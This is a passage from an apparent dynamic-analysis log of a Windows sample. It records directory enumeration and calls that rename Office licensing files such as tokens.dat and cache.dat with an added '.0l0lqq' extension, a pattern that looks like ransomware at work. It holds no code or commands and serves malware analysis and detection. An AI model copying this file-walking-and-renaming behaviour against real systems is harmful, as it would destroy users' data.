ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0xfa44d4a0, ftLastWriteTime.dwHighDateTime=0x1d305fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.700] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cache", cAlternateFileName="")) returned 1 [0252.700] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c015050, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0x63c5e40, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x469bd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="tokens.dat", cAlternateFileName="")) returned 1 [0252.700] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c015050, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0x63c5e40, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x469bd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="tokens.dat", cAlternateFileName="")) returned 0 [0252.701] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0xfa44d4a0, ftLastWriteTime.dwHighDateTime=0x1d305fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.701] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cache", cAlternateFileName="")) returned 1 [0252.701] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c015050, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0x63c5e40, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x469bd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="tokens.dat", cAlternateFileName="")) returned 1 [0252.701] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0252.703] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", lpFilePart=0x0) returned 0x48 [0253.133] MoveFileW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.0l0lqq" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\tokens.dat.0l0lqq")) returned 1 [0253.138] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0253.138] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9de525d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2caa5f40, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40270, dwReserved0=0x0, dwReserved1=0x0, cFileName="cache.dat", cAlternateFileName="")) returned 1 [0253.138] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9de525d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2caa5f40, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40270, dwReserved0=0x0, dwReserved1=0x0, cFileName="cache.dat", cAlternateFileName="")) returned 0 [0253.138] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0253.138] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9de525d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2caa5f40, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40270, dwReserved0=0x0, dwReserved1=0x0, cFileName="cache.dat", cAlternateFileName="")) returned 1 [0253.138] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0253.164] MoveFileW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.0l0lqq" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat.0l0lqq")) returned 1 [0253.171] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0253.171] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5011dd00, ftCreationTime.dwHighDateTime=0x1ca04ff, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5011dd00, ftLastWriteTime.dwHighDateTime=0x1ca04ff, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssetLibrary.ico", cAlternateFileName="ASSETL~1.ICO")) returned 1 [0253.171] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabeeea00, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x51e19d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xabeeea00, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="DocumentRepository.ico", cAlternateFileName="DOCUME~1.ICO")) returned 1 [0253.171] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2bfbd800, ftCreationTime.dwHighDateTime=0x1c9facb, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2bfbd800, ftLastWriteTime.dwHighDateTime=0x1c9facb, nFileSizeHigh=0x0, nFileSizeLow=0x5532e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MySharePoints.ico", cAlternateFileName="MYSHAR~1.ICO")) returned 1 [0253.171] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc92d1d00, ftCreationTime.dwHighDateTime=0x1c627a2, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc92d1d00, ftLastWriteTime.dwHighDateTime=0x1c627a2, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MySite.ico", cAlternateFileName="")) returned 1 [0253.172] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf2444900, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x5ab49610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2444900, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharePointPortalSite.ico", cAlternateFileName="SHAREP~1.ICO")) returned 1 [0253.172] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad743900, ftCreationTime.dwHighDateTime=0x1c62706, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad743900, ftLastWriteTime.dwHighDateTime=0x1c62706, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharePointTeamSite.ico", cAlternateFileName="SHAREP~2.ICO")) returned 1 [0253.172] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UICaptions", cAlternateFileName="UICAPT~1")) returned 1 [0253.172] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0253.172] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0253.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.173] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE", lpFilePart=0x0) returned 0x23 [0253.173] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\", lpFilePart=0x0) returned 0x24 [0253.174] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0253.174] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5011dd00, ftCreationTime.dwHighDateTime=0x1ca04ff, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5011dd00, ftLastWriteTime.dwHighDateTime=0x1ca04ff, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssetLibrary.ico", cAlternateFileName="ASSETL~1.ICO")) returned 1 [0253.174] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabeeea00, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x51e19d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xabeeea00, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="DocumentRepository.ico", cAlternateFileName="DOCUME~1.ICO")) returned 1 [0253.174] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2bfbd800, ftCreationTime.dwHighDateTime=0x1c9facb, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2bfbd800, ftLastWriteTime.dwHighDateTime=0x1c9facb, nFileSizeHigh=0x0, nFileSizeLow=0x5532e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MySharePoints.ico", cAlternateFileName="MYSHAR~1.ICO")) returned 1 [0253.175] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc92d1d00, ftCreationTime.dwHighDateTime=0x1c627a2, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc92d1d00, ftLastWriteTime.dwHighDateTime=0x1c627a2, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MySite.ico", cAlternateFileName="")) returned 1 [0253.175] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf2444900, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x5ab49610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2444900, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharePointPortalSite.ico", cAlternateFileName="SHAREP~1.ICO")) returned 1 [0253.175] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad743900, ftCreationTime.dwHighDateTime=0x1c62706, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad743900, ftLastWriteTime.dwHighDateTime=0x1c62706, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharePointTeamSite.ico", cAlternateFileName="SHAREP~2.ICO")) returned 1 [0253.175] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UICaptions", cAlternateFileName="UICAPT~1")) returned 1 [0253.175] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UICaptions", cAlternateFileName="UICAPT~1")) returned 0 [0253.175] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0253.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.176] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", lpFilePart=0x0) returned 0x34 [0253.176] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", lpFilePart=0x0) returned 0x34 [0253.176] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", lpFilePart=0x0) returned 0x34 [0253.176] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", lpFilePart=0x0) returned 0x34 [0253.176] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", lpFilePart=0x0) returned 0x34 [0253.176] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", lpFilePart=0x0) returned 0x34 [0253.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.177] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\assetlibrary.ico"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5011dd00, ftCreationTime.dwHighDateTime=0x1ca04ff, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5011dd00, ftLastWriteTime.dwHighDateTime=0x1ca04ff, nFileSizeHigh=0x0, nFileSizeLow=0x1536)) returned 1 [0253.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0253.180] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\assetlibrary.ico"), fInfoLevelId=0x0, lpFileInformation=0x6cd4494 | out: lpFileInformation=0x6cd4494*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5011dd00, ftCreationTime.dwHighDateTime=0x1ca04ff, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5011dd00, ftLastWriteTime.dwHighDateTime=0x1ca04ff, nFileSizeHigh=0x0, nFileSizeLow=0x1536)) returned 1 [0253.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0253.180] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", lpFilePart=0x0) returned 0x34 [0253.180] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", lpFilePart=0x0) returned 0x34 [0253.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.180] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\assetlibrary.ico"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5011dd00, ftCreationTime.dwHighDateTime=0x1ca04ff, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5011dd00, ftLastWriteTime.dwHighDateTime=0x1ca04ff, nFileSizeHigh=0x0, nFileSizeLow=0x1536)) returned 1 [0253.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.180] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico", lpFilePart=0x0) returned 0x34 [0253.184] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.184] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.184] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.184] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.184] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.184] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.184] GetFullPathNameW (in: lpFileName="C:\\Users\\All 